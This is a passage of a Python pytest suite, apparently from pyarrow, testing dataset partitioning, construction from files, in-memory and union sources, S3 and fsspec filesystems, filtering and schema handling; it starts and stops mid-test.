with pytest.raises(ValueError):
ds.partitioning()
with pytest.raises(ValueError, match="Expected list"):
ds.partitioning(field_names=schema)
with pytest.raises(ValueError, match="Cannot specify both"):
ds.partitioning(schema, field_names=schema)
# Hive partitioning
part = ds.partitioning(schema, flavor="hive")
assert isinstance(part, ds.HivePartitioning)
part = ds.partitioning(schema, dictionaries="infer", flavor="hive")
assert isinstance(part, ds.PartitioningFactory)
part = ds.partitioning(flavor="hive")
assert isinstance(part, ds.PartitioningFactory)
# cannot pass list of names
with pytest.raises(ValueError):
ds.partitioning(names, flavor="hive")
with pytest.raises(ValueError, match="Cannot specify 'field_names'"):
ds.partitioning(field_names=names, flavor="hive")
# unsupported flavor
with pytest.raises(ValueError):
ds.partitioning(schema, flavor="unsupported")
@pytest.mark.parquet
def test_directory_partitioning_dictionary_key(mockfs):
# ARROW-8088 specifying partition key as dictionary type
schema = pa.schema([
pa.field('group', pa.dictionary(pa.int8(), pa.int32())),
pa.field('key', pa.dictionary(pa.int8(), pa.string()))
])
part = ds.DirectoryPartitioning.discover(schema=schema)
dataset = ds.dataset(
"subdir", format="parquet", filesystem=mockfs, partitioning=part
)
assert dataset.partitioning.schema == schema
table = dataset.to_table()
assert table.column('group').type.equals(schema.types[0])
assert table.column('group').to_pylist() == [1] * 5 + [2] * 5
assert table.column('key').type.equals(schema.types[1])
assert table.column('key').to_pylist() == ['xxx'] * 5 + ['yyy'] * 5
def test_hive_partitioning_dictionary_key(multisourcefs):
# ARROW-8088 specifying partition key as dictionary type
schema = pa.schema([
pa.field('year', pa.dictionary(pa.int8(), pa.int16())),
pa.field('month', pa.dictionary(pa.int8(), pa.int16()))
])
part = ds.HivePartitioning.discover(schema=schema)
dataset = ds.dataset(
"hive", format="parquet", filesystem=multisourcefs, partitioning=part
)
assert dataset.partitioning.schema == schema
table = dataset.to_table()
year_dictionary = list(range(2006, 2011))
month_dictionary = list(range(1, 13))
assert table.column('year').type.equals(schema.types[0])
for chunk in table.column('year').chunks:
actual = chunk.dictionary.to_pylist()
actual.sort()
assert actual == year_dictionary
assert table.column('month').type.equals(schema.types[1])
for chunk in table.column('month').chunks:
actual = chunk.dictionary.to_pylist()
actual.sort()
assert actual == month_dictionary
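# Helpers that write one (or two) small parquet files and return the
# corresponding table(s) and path(s) for the dataset-construction tests below.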
def _create_single_file(base_dir, table=None, row_group_size=None):
if table is None:
table = pa.table({'a': range(9), 'b': [0.] * 4 + [1.] * 5})
path = base_dir / "test.parquet"
pq.write_table(table, path, row_group_size=row_group_size)
return table, path
def _create_directory_of_files(base_dir):
table1 = pa.table({'a': range(9), 'b': [0.] * 4 + [1.] * 5})
path1 = base_dir / "test1.parquet"
pq.write_table(table1, path1)
table2 = pa.table({'a': range(9, 18), 'b': [0.] * 4 + [1.] * 5})
path2 = base_dir / "test2.parquet"
pq.write_table(table2, path2)
return (table1, table2), (path1, path2)
def _check_dataset(dataset, table, dataset_reader):
# also test that pickle roundtrip keeps the functionality
for d in [dataset, pickle.loads(pickle.dumps(dataset))]:
assert dataset.schema.equals(table.schema)
assert dataset_reader.to_table(dataset).equals(table)
def _check_dataset_from_path(path, table, dataset_reader, **kwargs):
# pathlib object
assert isinstance(path, pathlib.Path)
# accept Path, str, List[Path], List[str]
for p in [path, str(path), [path], [str(path)]]:
dataset = ds.dataset(path, **kwargs)
assert isinstance(dataset, ds.FileSystemDataset)
_check_dataset(dataset, table, dataset_reader)
# relative string path
with change_cwd(path.parent):
dataset = ds.dataset(path.name, **kwargs)
assert isinstance(dataset, ds.FileSystemDataset)
_check_dataset(dataset, table, dataset_reader)
@pytest.mark.parquet
def test_open_dataset_single_file(tempdir, dataset_reader):
table, path = _create_single_file(tempdir)
_check_dataset_from_path(path, table, dataset_reader)
@pytest.mark.parquet
def test_deterministic_row_order(tempdir, dataset_reader):
# ARROW-8447 Ensure that dataset.to_table (and Scanner::ToTable) returns a
# deterministic row ordering. This is achieved by constructing a single
# parquet file with one row per RowGroup.
table, path = _create_single_file(tempdir, row_group_size=1)
_check_dataset_from_path(path, table, dataset_reader)
@pytest.mark.parquet
def test_open_dataset_directory(tempdir, dataset_reader):
tables, _ = _create_directory_of_files(tempdir)
table = pa.concat_tables(tables)
_check_dataset_from_path(tempdir, table, dataset_reader)
@pytest.mark.parquet
def test_open_dataset_list_of_files(tempdir, dataset_reader):
tables, (path1, path2) = _create_directory_of_files(tempdir)
table = pa.concat_tables(tables)
datasets = [
ds.dataset([path1, path2]),
ds.dataset([str(path1), str(path2)])
]
datasets += [
pickle.loads(pickle.dumps(d)) for d in datasets
]
for dataset in datasets:
assert dataset.schema.equals(table.schema)
result = dataset_reader.to_table(dataset)
assert result.equals(table)
@pytest.mark.parquet
def test_open_dataset_filesystem_fspath(tempdir):
# single file
table, path = _create_single_file(tempdir)
fspath = FSProtocolClass(path)
# filesystem inferred from path
dataset1 = ds.dataset(fspath)
assert dataset1.schema.equals(table.schema)
# filesystem specified
dataset2 = ds.dataset(fspath, filesystem=fs.LocalFileSystem())
assert dataset2.schema.equals(table.schema)
# passing different filesystem
with pytest.raises(TypeError):
ds.dataset(fspath, filesystem=fs._MockFileSystem())
@pytest.mark.parquet
def test_construct_from_single_file(tempdir, dataset_reader):
directory = tempdir / 'single-file'
directory.mkdir()
table, path = _create_single_file(directory)
relative_path = path.relative_to(directory)
# instantiate from a single file
d1 = ds.dataset(path)
# instantiate from a single file with a filesystem object
d2 = ds.dataset(path, filesystem=fs.LocalFileSystem())
# instantiate from a single file with prefixed filesystem URI
d3 = ds.dataset(str(relative_path), filesystem=_filesystem_uri(directory))
# pickle roundtrip
d4 = pickle.loads(pickle.dumps(d1))
assert dataset_reader.to_table(d1) == dataset_reader.to_table(
d2) == dataset_reader.to_table(d3) == dataset_reader.to_table(d4)
@pytest.mark.parquet
def test_construct_from_single_directory(tempdir, dataset_reader):
directory = tempdir / 'single-directory'
directory.mkdir()
tables, paths = _create_directory_of_files(directory)
d1 = ds.dataset(directory)
d2 = ds.dataset(directory, filesystem=fs.LocalFileSystem())
d3 = ds.dataset(directory.name, filesystem=_filesystem_uri(tempdir))
t1 = dataset_reader.to_table(d1)
t2 = dataset_reader.to_table(d2)
t3 = dataset_reader.to_table(d3)
assert t1 == t2 == t3
# test pickle roundtrip
for d in [d1, d2, d3]:
restored = pickle.loads(pickle.dumps(d))
assert dataset_reader.to_table(restored) == t1
@pytest.mark.parquet
def test_construct_from_list_of_files(tempdir, dataset_reader):
# instantiate from a list of files
directory = tempdir / 'list-of-files'
directory.mkdir()
tables, paths = _create_directory_of_files(directory)
relative_paths = [p.relative_to(tempdir) for p in paths]
with change_cwd(tempdir):
d1 = ds.dataset(relative_paths)
t1 = dataset_reader.to_table(d1)
assert len(t1) == sum(map(len, tables))
d2 = ds.dataset(relative_paths, filesystem=_filesystem_uri(tempdir))
t2 = dataset_reader.to_table(d2)
d3 = ds.dataset(paths)
t3 = dataset_reader.to_table(d3)
d4 = ds.dataset(paths, filesystem=fs.LocalFileSystem())
t4 = dataset_reader.to_table(d4)
assert t1 == t2 == t3 == t4
@pytest.mark.parquet
def test_construct_from_list_of_mixed_paths_fails(mockfs):
    # instantiate from a list of mixed paths
files = [
'subdir/1/xxx/file0.parquet',
'subdir/1/xxx/doesnt-exist.parquet',
]
with pytest.raises(FileNotFoundError, match='doesnt-exist'):
ds.dataset(files, filesystem=mockfs)
@pytest.mark.parquet
def test_construct_from_mixed_child_datasets(mockfs):
    # instantiate a UnionDataset from a list of child datasets
a = ds.dataset(['subdir/1/xxx/file0.parquet',
'subdir/2/yyy/file1.parquet'], filesystem=mockfs)
b = ds.dataset('subdir', filesystem=mockfs)
dataset = ds.dataset([a, b])
assert isinstance(dataset, ds.UnionDataset)
assert len(list(dataset.get_fragments())) == 4
table = dataset.to_table()
assert len(table) == 20
assert table.num_columns == 5
assert len(dataset.children) == 2
for child in dataset.children:
assert child.files == ['subdir/1/xxx/file0.parquet',
'subdir/2/yyy/file1.parquet']
def test_construct_empty_dataset():
empty = ds.dataset([], format='ipc')
table = empty.to_table()
assert table.num_rows == 0
assert table.num_columns == 0
def test_construct_dataset_with_invalid_schema():
empty = ds.dataset([], format='ipc', schema=pa.schema([
('a', pa.int64()),
('a', pa.string())
]))
with pytest.raises(ValueError, match='Multiple matches for .*a.* in '):
empty.to_table()
def test_construct_from_invalid_sources_raise(multisourcefs):
child1 = ds.FileSystemDatasetFactory(
multisourcefs,
fs.FileSelector('/plain'),
format=ds.ParquetFileFormat()
)
child2 = ds.FileSystemDatasetFactory(
multisourcefs,
fs.FileSelector('/schema'),
format=ds.ParquetFileFormat()
)
batch1 = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["a"])
batch2 = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["b"])
with pytest.raises(TypeError, match='Expected.*FileSystemDatasetFactory'):
ds.dataset([child1, child2])
expected = (
"Expected a list of path-like or dataset objects, or a list "
"of batches or tables. The given list contains the following "
"types: int"
)
with pytest.raises(TypeError, match=expected):
ds.dataset([1, 2, 3])
expected = (
"Expected a path-like, list of path-likes or a list of Datasets "
"instead of the given type: NoneType"
)
with pytest.raises(TypeError, match=expected):
ds.dataset(None)
expected = (
"Expected a path-like, list of path-likes or a list of Datasets "
"instead of the given type: generator"
)
with pytest.raises(TypeError, match=expected):
ds.dataset((batch1 for _ in range(3)))
expected = (
"Must provide schema to construct in-memory dataset from an empty list"
)
with pytest.raises(ValueError, match=expected):
ds.InMemoryDataset([])
expected = (
"Item has schema\nb: int64\nwhich does not match expected schema\n"
"a: int64"
)
with pytest.raises(TypeError, match=expected):
ds.dataset([batch1, batch2])
expected = (
"Expected a list of path-like or dataset objects, or a list of "
"batches or tables. The given list contains the following types:"
)
with pytest.raises(TypeError, match=expected):
ds.dataset([batch1, 0])
expected = (
"Expected a list of tables or batches. The given list contains a int"
)
with pytest.raises(TypeError, match=expected):
ds.InMemoryDataset([batch1, 0])
def test_construct_in_memory(dataset_reader):
batch = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["a"])
table = pa.Table.from_batches([batch])
dataset_table = ds.dataset([], format='ipc', schema=pa.schema([])
).to_table()
assert dataset_table == pa.table([])
for source in (batch, table, [batch], [table]):
dataset = ds.dataset(source)
assert dataset_reader.to_table(dataset) == table
assert len(list(dataset.get_fragments())) == 1
assert next(dataset.get_fragments()).to_table() == table
assert pa.Table.from_batches(list(dataset.to_batches())) == table
@pytest.mark.parametrize('use_threads', [False, True])
def test_scan_iterator(use_threads):
batch = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["a"])
table = pa.Table.from_batches([batch])
# When constructed from readers/iterators, should be one-shot
match = "OneShotFragment was already scanned"
for factory, schema in (
(lambda: pa.RecordBatchReader.from_batches(
batch.schema, [batch]), None),
(lambda: (batch for _ in range(1)), batch.schema),
):
# Scanning the fragment consumes the underlying iterator
scanner = ds.Scanner.from_batches(
factory(), schema=schema, use_threads=use_threads)
assert scanner.to_table() == table
with pytest.raises(pa.ArrowInvalid, match=match):
scanner.to_table()
def _create_partitioned_dataset(basedir):
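    # Write three 3-row parquet files under part=0/1/2 directories and return
    # the expected full table (with an int32 'part' column appended) plus the
    # dataset root path.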
table = pa.table({'a': range(9), 'b': [0.] * 4 + [1.] * 5})
path = basedir / "dataset-partitioned"
path.mkdir()
for i in range(3):
part = path / "part={}".format(i)
part.mkdir()
pq.write_table(table.slice(3*i, 3), part / "test.parquet")
full_table = table.append_column(
"part", pa.array(np.repeat([0, 1, 2], 3), type=pa.int32()))
return full_table, path
@pytest.mark.parquet
def test_open_dataset_partitioned_directory(tempdir, dataset_reader):
full_table, path = _create_partitioned_dataset(tempdir)
# no partitioning specified, just read all individual files
table = full_table.select(['a', 'b'])
_check_dataset_from_path(path, table, dataset_reader)
# specify partition scheme with discovery
dataset = ds.dataset(
str(path), partitioning=ds.partitioning(flavor="hive"))
assert dataset.schema.equals(full_table.schema)
# specify partition scheme with discovery and relative path
with change_cwd(tempdir):
dataset = ds.dataset("dataset-partitioned/",
partitioning=ds.partitioning(flavor="hive"))
assert dataset.schema.equals(full_table.schema)
# specify partition scheme with string short-cut
dataset = ds.dataset(str(path), partitioning="hive")
assert dataset.schema.equals(full_table.schema)
# specify partition scheme with explicit scheme
dataset = ds.dataset(
str(path),
partitioning=ds.partitioning(
pa.schema([("part", pa.int8())]), flavor="hive"))
expected_schema = table.schema.append(pa.field("part", pa.int8()))
assert dataset.schema.equals(expected_schema)
result = dataset.to_table()
expected = table.append_column(
"part", pa.array(np.repeat([0, 1, 2], 3), type=pa.int8()))
assert result.equals(expected)
@pytest.mark.parquet
def test_open_dataset_filesystem(tempdir):
# single file
table, path = _create_single_file(tempdir)
# filesystem inferred from path
dataset1 = ds.dataset(str(path))
assert dataset1.schema.equals(table.schema)
# filesystem specified
dataset2 = ds.dataset(str(path), filesystem=fs.LocalFileSystem())
assert dataset2.schema.equals(table.schema)
# local filesystem specified with relative path
with change_cwd(tempdir):
dataset3 = ds.dataset("test.parquet", filesystem=fs.LocalFileSystem())
assert dataset3.schema.equals(table.schema)
# passing different filesystem
with pytest.raises(FileNotFoundError):
ds.dataset(str(path), filesystem=fs._MockFileSystem())
@pytest.mark.parquet
def test_open_dataset_unsupported_format(tempdir):
_, path = _create_single_file(tempdir)
with pytest.raises(ValueError, match="format 'blabla' is not supported"):
ds.dataset([path], format="blabla")
@pytest.mark.parquet
def test_open_union_dataset(tempdir, dataset_reader):
_, path = _create_single_file(tempdir)
dataset = ds.dataset(path)
union = ds.dataset([dataset, dataset])
assert isinstance(union, ds.UnionDataset)
pickled = pickle.loads(pickle.dumps(union))
assert dataset_reader.to_table(pickled) == dataset_reader.to_table(union)
def test_open_union_dataset_with_additional_kwargs(multisourcefs):
child = ds.dataset('/plain', filesystem=multisourcefs, format='parquet')
with pytest.raises(ValueError, match="cannot pass any additional"):
ds.dataset([child], format="parquet")
def test_open_dataset_non_existing_file():
    # ARROW-8213: opening a dataset with an incorrect local path used to give
    # a confusing error message
with pytest.raises(FileNotFoundError):
ds.dataset('i-am-not-existing.arrow', format='ipc')
with pytest.raises(pa.ArrowInvalid, match='cannot be relative'):
ds.dataset('file:i-am-not-existing.arrow', format='ipc')
@pytest.mark.parquet
@pytest.mark.parametrize('partitioning', ["directory", "hive"])
@pytest.mark.parametrize('null_fallback', ['xyz', None])
@pytest.mark.parametrize('infer_dictionary', [False, True])
@pytest.mark.parametrize('partition_keys', [
(["A", "B", "C"], [1, 2, 3]),
([1, 2, 3], ["A", "B", "C"]),
(["A", "B", "C"], ["D", "E", "F"]),
([1, 2, 3], [4, 5, 6]),
([1, None, 3], ["A", "B", "C"]),
([1, 2, 3], ["A", None, "C"]),
([None, 2, 3], [None, 2, 3]),
])
def test_partition_discovery(
tempdir, partitioning, null_fallback, infer_dictionary, partition_keys
):
# ARROW-9288 / ARROW-9476
table = pa.table({'a': range(9), 'b': [0.0] * 4 + [1.0] * 5})
has_null = None in partition_keys[0] or None in partition_keys[1]
if partitioning == "directory" and has_null:
        # Directory partitioning can't handle null partition values
return
if partitioning == "directory":
partitioning = ds.DirectoryPartitioning.discover(
["part1", "part2"], infer_dictionary=infer_dictionary)
fmt = "{0}/{1}"
null_value = None
else:
if null_fallback:
partitioning = ds.HivePartitioning.discover(
infer_dictionary=infer_dictionary, null_fallback=null_fallback
)
else:
partitioning = ds.HivePartitioning.discover(
infer_dictionary=infer_dictionary)
fmt = "part1={0}/part2={1}"
if null_fallback:
null_value = null_fallback
else:
null_value = "__HIVE_DEFAULT_PARTITION__"
basepath = tempdir / "dataset"
basepath.mkdir()
part_keys1, part_keys2 = partition_keys
for part1 in part_keys1:
for part2 in part_keys2:
path = basepath / \
fmt.format(part1 or null_value, part2 or null_value)
path.mkdir(parents=True)
pq.write_table(table, path / "test.parquet")
dataset = ds.dataset(str(basepath), partitioning=partitioning)
def expected_type(key):
if infer_dictionary:
value_type = pa.string() if isinstance(key, str) else pa.int32()
return pa.dictionary(pa.int32(), value_type)
else:
return pa.string() if isinstance(key, str) else pa.int32()
expected_schema = table.schema.append(
pa.field("part1", expected_type(part_keys1[0]))
).append(
pa.field("part2", expected_type(part_keys2[0]))
)
assert dataset.schema.equals(expected_schema)
@pytest.mark.pandas
def test_dataset_partitioned_dictionary_type_reconstruct(tempdir):
# https://issues.apache.org/jira/browse/ARROW-11400
table = pa.table({'part': np.repeat(['A', 'B'], 5), 'col': range(10)})
part = ds.partitioning(table.select(['part']).schema, flavor="hive")
ds.write_dataset(table, tempdir, partitioning=part, format="feather")
dataset = ds.dataset(
tempdir, format="feather",
partitioning=ds.HivePartitioning.discover(infer_dictionary=True)
)
expected = pa.table(
{'col': table['col'], 'part': table['part'].dictionary_encode()}
)
assert dataset.to_table().equals(expected)
fragment = list(dataset.get_fragments())[0]
assert fragment.to_table(schema=dataset.schema).equals(expected[:5])
part_expr = fragment.partition_expression
restored = pickle.loads(pickle.dumps(dataset))
assert restored.to_table().equals(expected)
restored = pickle.loads(pickle.dumps(fragment))
assert restored.to_table(schema=dataset.schema).equals(expected[:5])
# to_pandas call triggers computation of the actual dictionary values
assert restored.to_table(schema=dataset.schema).to_pandas().equals(
expected[:5].to_pandas()
)
assert restored.partition_expression.equals(part_expr)
@pytest.fixture
@pytest.mark.parquet
def s3_example_simple(s3_server):
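    # Fixture: create 'mybucket/data.parquet' on the test S3 server and return
    # the table, path, filesystem, full URI and connection details.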
from pyarrow.fs import FileSystem
host, port, access_key, secret_key = s3_server['connection']
uri = (
"s3://{}:{}@mybucket/data.parquet?scheme=http&endpoint_override={}:{}"
"&allow_bucket_creation=True"
.format(access_key, secret_key, host, port)
)
fs, path = FileSystem.from_uri(uri)
fs.create_dir("mybucket")
table = pa.table({'a': [1, 2, 3]})
with fs.open_output_stream("mybucket/data.parquet") as out:
pq.write_table(table, out)
return table, path, fs, uri, host, port, access_key, secret_key
@pytest.mark.parquet
@pytest.mark.s3
def test_open_dataset_from_uri_s3(s3_example_simple, dataset_reader):
# open dataset from non-localfs string path
table, path, fs, uri, _, _, _, _ = s3_example_simple
# full string URI
dataset = ds.dataset(uri, format="parquet")
assert dataset_reader.to_table(dataset).equals(table)
# passing filesystem object
dataset = ds.dataset(path, format="parquet", filesystem=fs)
assert dataset_reader.to_table(dataset).equals(table)
@pytest.mark.parquet
@pytest.mark.s3 # still needed to create the data
def test_open_dataset_from_uri_s3_fsspec(s3_example_simple):
table, path, _, _, host, port, access_key, secret_key = s3_example_simple
s3fs = pytest.importorskip("s3fs")
from pyarrow.fs import PyFileSystem, FSSpecHandler
fs = s3fs.S3FileSystem(
key=access_key,
secret=secret_key,
client_kwargs={
'endpoint_url': 'http://{}:{}'.format(host, port)
}
)
# passing as fsspec filesystem
dataset = ds.dataset(path, format="parquet", filesystem=fs)
assert dataset.to_table().equals(table)
# directly passing the fsspec-handler
fs = PyFileSystem(FSSpecHandler(fs))
dataset = ds.dataset(path, format="parquet", filesystem=fs)
assert dataset.to_table().equals(table)
@pytest.mark.parquet
@pytest.mark.s3
def test_open_dataset_from_s3_with_filesystem_uri(s3_server):
from pyarrow.fs import FileSystem
host, port, access_key, secret_key = s3_server['connection']
bucket = 'theirbucket'
path = 'nested/folder/data.parquet'
uri = "s3://{}:{}@{}/{}?scheme=http&endpoint_override={}:{}"\
"&allow_bucket_creation=true".format(
access_key, secret_key, bucket, path, host, port
)
fs, path = FileSystem.from_uri(uri)
assert path == 'theirbucket/nested/folder/data.parquet'
fs.create_dir(bucket)
table = pa.table({'a': [1, 2, 3]})
with fs.open_output_stream(path) as out:
pq.write_table(table, out)
# full string URI
dataset = ds.dataset(uri, format="parquet")
assert dataset.to_table().equals(table)
# passing filesystem as an uri
template = (
"s3://{}:{}@{{}}?scheme=http&endpoint_override={}:{}".format(
access_key, secret_key, host, port
)
)
cases = [
('theirbucket/nested/folder/', '/data.parquet'),
('theirbucket/nested/folder', 'data.parquet'),
('theirbucket/nested/', 'folder/data.parquet'),
('theirbucket/nested', 'folder/data.parquet'),
('theirbucket', '/nested/folder/data.parquet'),
('theirbucket', 'nested/folder/data.parquet'),
]
for prefix, path in cases:
uri = template.format(prefix)
dataset = ds.dataset(path, filesystem=uri, format="parquet")
assert dataset.to_table().equals(table)
with pytest.raises(pa.ArrowInvalid, match='Missing bucket name'):
uri = template.format('/')
ds.dataset('/theirbucket/nested/folder/data.parquet', filesystem=uri)
error = (
"The path component of the filesystem URI must point to a directory "
"but it has a type: `{}`. The path component is `{}` and the given "
"filesystem URI is `{}`"
)
path = 'theirbucket/doesnt/exist'
uri = template.format(path)
with pytest.raises(ValueError) as exc:
ds.dataset('data.parquet', filesystem=uri)
assert str(exc.value) == error.format('NotFound', path, uri)
path = 'theirbucket/nested/folder/data.parquet'
uri = template.format(path)
with pytest.raises(ValueError) as exc:
ds.dataset('data.parquet', filesystem=uri)
assert str(exc.value) == error.format('File', path, uri)
@pytest.mark.parquet
def test_open_dataset_from_fsspec(tempdir):
table, path = _create_single_file(tempdir)
fsspec = pytest.importorskip("fsspec")
localfs = fsspec.filesystem("file")
dataset = ds.dataset(path, filesystem=localfs)
assert dataset.schema.equals(table.schema)
@pytest.mark.parquet
def test_file_format_inspect_fsspec(tempdir):
# https://issues.apache.org/jira/browse/ARROW-16413
fsspec = pytest.importorskip("fsspec")
# create bucket + file with pyarrow
table = pa.table({'a': [1, 2, 3]})
path = tempdir / "data.parquet"
pq.write_table(table, path)
# read using fsspec filesystem
fsspec_fs = fsspec.filesystem("file")
assert fsspec_fs.ls(tempdir)[0].endswith("data.parquet")
# inspect using dataset file format
format = ds.ParquetFileFormat()
# manually creating a PyFileSystem instead of using fs._ensure_filesystem
# which would convert an fsspec local filesystem to a native one
filesystem = fs.PyFileSystem(fs.FSSpecHandler(fsspec_fs))
schema = format.inspect(path, filesystem)
assert schema.equals(table.schema)
fragment = format.make_fragment(path, filesystem)
assert fragment.physical_schema.equals(table.schema)
@pytest.mark.pandas
def test_filter_timestamp(tempdir, dataset_reader):
# ARROW-11379
path = tempdir / "test_partition_timestamps"
table = pa.table({
"dates": ['2012-01-01', '2012-01-02'] * 5,
"id": range(10)})
# write dataset partitioned on dates (as strings)
part = ds.partitioning(table.select(['dates']).schema, flavor="hive")
ds.write_dataset(table, path, partitioning=part, format="feather")
# read dataset partitioned on dates (as timestamps)
part = ds.partitioning(pa.schema([("dates", pa.timestamp("s"))]),
flavor="hive")
dataset = ds.dataset(path, format="feather", partitioning=part)
condition = ds.field("dates") > pd.Timestamp("2012-01-01")
table = dataset_reader.to_table(dataset, filter=condition)
assert table.column('id').to_pylist() == [1, 3, 5, 7, 9]
import datetime
condition = ds.field("dates") > datetime.datetime(2012, 1, 1)
table = dataset_reader.to_table(dataset, filter=condition)
assert table.column('id').to_pylist() == [1, 3, 5, 7, 9]
@pytest.mark.parquet
def test_filter_implicit_cast(tempdir, dataset_reader):
# ARROW-7652
table = pa.table({'a': pa.array([0, 1, 2, 3, 4, 5], type=pa.int8())})
_, path = _create_single_file(tempdir, table)
dataset = ds.dataset(str(path))
filter_ = ds.field('a') > 2
assert len(dataset_reader.to_table(dataset, filter=filter_)) == 3
@pytest.mark.parquet
def test_filter_equal_null(tempdir, dataset_reader):
# ARROW-12066 equality with null, although not useful, should not crash
table = pa.table({"A": ["a", "b", None]})
_, path = _create_single_file(tempdir, table)
dataset = ds.dataset(str(path))
table = dataset_reader.to_table(
dataset, filter=ds.field("A") == ds.scalar(None)
)
assert table.num_rows == 0
@pytest.mark.parquet
def test_filter_compute_expression(tempdir, dataset_reader):
table = pa.table({
"A": ["a", "b", None, "a", "c"],
"B": [datetime.datetime(2022, 1, 1, i) for i in range(5)],
"C": [datetime.datetime(2022, 1, i) for i in range(1, 6)],
})
_, path = _create_single_file(tempdir, table)
dataset = ds.dataset(str(path))
filter_ = pc.is_in(ds.field('A'), pa.array(["a", "b"]))
assert dataset_reader.to_table(dataset, filter=filter_).num_rows == 3
filter_ = pc.hour(ds.field('B')) >= 3
assert dataset_reader.to_table(dataset, filter=filter_).num_rows == 2
days = pc.days_between(ds.field('B'), ds.field("C"))
result = dataset_reader.to_table(dataset, columns={"days": days})
assert result["days"].to_pylist() == [0, 1, 2, 3, 4]
def test_dataset_union(multisourcefs):
child = ds.FileSystemDatasetFactory(
multisourcefs, fs.FileSelector('/plain'),
format=ds.ParquetFileFormat()
)
factory = ds.UnionDatasetFactory([child])
# TODO(bkietz) reintroduce factory.children property
assert len(factory.inspect_schemas()) == 1
assert all(isinstance(s, pa.Schema) for s in factory.inspect_schemas())
assert factory.inspect_schemas()[0].equals(child.inspect())
assert factory.inspect().equals(child.inspect())
assert isinstance(factory.finish(), ds.Dataset)
def test_union_dataset_from_other_datasets(tempdir, multisourcefs):
child1 = ds.dataset('/plain', filesystem=multisourcefs, format='parquet')
child2 = ds.dataset('/schema', filesystem=multisourcefs, format='parquet',
partitioning=['week', 'color'])
child3 = ds.dataset('/hive', filesystem=multisourcefs, format='parquet',
partitioning='hive')
assert child1.schema != child2.schema != child3.schema
assembled = ds.dataset([child1, child2, child3])
assert isinstance(assembled, ds.UnionDataset)
msg = 'cannot pass any additional arguments'
with pytest.raises(ValueError, match=msg):
ds.dataset([child1, child2], filesystem=multisourcefs)
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
('week', pa.int32()),
('year', pa.int32()),
('month', pa.int32()),
])
assert assembled.schema.equals(expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
assembled = ds.dataset([child1, child3])
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
('year', pa.int32()),
('month', pa.int32()),
])
assert assembled.schema.equals(expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
expected_schema = pa.schema([
('month', pa.int32()),
('color', pa.string()),
('date', pa.date32()),
])
assembled = ds.dataset([child1, child3], schema=expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
expected_schema = pa.schema([
('month', pa.int32()),
('color', pa.string()),
('unknown', pa.string()) # fill with nulls
])
assembled = ds.dataset([child1, child3], schema=expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
# incompatible schemas, date and index columns have conflicting types
table = pa.table([range(9), [0.] * 4 + [1.] * 5, 'abcdefghj'],
names=['date', 'value', 'index'])
_, path = _create_single_file(tempdir, table=table)
child4 = ds.dataset(path)
with pytest.raises(pa.ArrowInvalid, match='Unable to merge'):
ds.dataset([child1, child4])
def test_dataset_from_a_list_of_local_directories_raises(multisourcefs):
msg = 'points to a directory, but only file paths are supported'
with pytest.raises(IsADirectoryError, match=msg):
ds.dataset(['/plain', '/schema', '/hive'], filesystem=multisourcefs)
def test_union_dataset_filesystem_datasets(multisourcefs):
# without partitioning
dataset = ds.dataset([
ds.dataset('/plain', filesystem=multisourcefs),
ds.dataset('/schema', filesystem=multisourcefs),
ds.dataset('/hive', filesystem=multisourcefs),
])
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
])
assert dataset.schema.equals(expected_schema)
# with hive partitioning for two hive sources
dataset = ds.dataset([
ds.dataset('/plain', filesystem=multisourcefs),
ds.dataset('/schema', filesystem=multisourcefs),
ds.dataset('/hive', filesystem=multisourcefs, partitioning='hive')
])
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
('year', pa.int32()),
('month', pa.int32()),
])
assert dataset.schema.equals(expected_schema)
@pytest.mark.parquet
def test_specified_schema(tempdir, dataset_reader):
table = pa.table({'a': [1, 2, 3], 'b': [.1, .2, .3]})
pq.write_table(table, tempdir / "data.parquet")
def _check_dataset(schema, expected, expected_schema=None):
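        # Open the parquet file with the given schema, check the reported
        # dataset schema, and check that the data read back matches `expected`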
dataset = ds.dataset(str(tempdir / "data.parquet"), schema=schema)
if expected_schema is not None:
assert dataset.schema.equals(expected_schema)
else:
assert dataset.schema.equals(schema)
result = dataset_reader.to_table(dataset)
assert result.equals(expected)
# no schema specified
schema = None
expected = table
_check_dataset(schema, expected, expected_schema=table.schema)
# identical schema specified
schema = table.schema
expected = table
_check_dataset(schema, expected)
    # Specifying schema with changed column order
schema = pa.schema([('b', 'float64'), ('a', 'int64')])
expected = pa.table([[.1, .2, .3], [1, 2, 3]], names=['b', 'a'])
_check_dataset(schema, expected)
# Specifying schema with missing column
schema = pa.schema([('a', 'int64')])
expected = pa.table([[1, 2, 3]], names=['a'])
_check_dataset(schema, expected)
# Specifying schema with additional column
schema = pa.schema([('a', 'int64'), ('c', 'int32')])
expected = pa.table([[1, 2, 3],
pa.array([None, None, None], type='int32')],
names=['a', 'c'])
_check_dataset(schema, expected)
# Specifying with differing field types
schema = pa.schema([('a', 'int32'), ('b', 'float64')])
dataset = ds.dataset(str(tempdir / "data.parquet"), schema=schema)
expected = pa.table([table['a'].cast('int32'),
table['b']],
names=['a', 'b'])
_check_dataset(schema, expected)
# Specifying with incompatible schema
schema = pa.schema([('a', pa.list_(pa.int32())), ('b', 'float64')])
dataset = ds.dataset(str(tempdir / "data.parquet"), schema=schema)
assert dataset.schema.equals(schema)
with pytest.raises(NotImplementedError,
match='Unsupported cast from int64 to list'):
dataset_reader.to_table(dataset)
@pytest.mark.parquet
def test_incompatible_schema_hang(tempdir, dataset_reader):
# ARROW-13480: deadlock when reading past an errored fragment
fn = tempdir / "data.parquet"
table = pa.table({'a': [1, 2, 3]})
pq.write_table(table, fn)
schema = pa.schema([('a', pa.null())])
dataset = ds.dataset([str(fn)] * 100, schema=schema)
assert dataset.schema.equals(schema)
scanner = dataset_reader.scanner(dataset)
with pytest.raises(NotImplementedError,
match='Unsupported cast from int64 to null'):
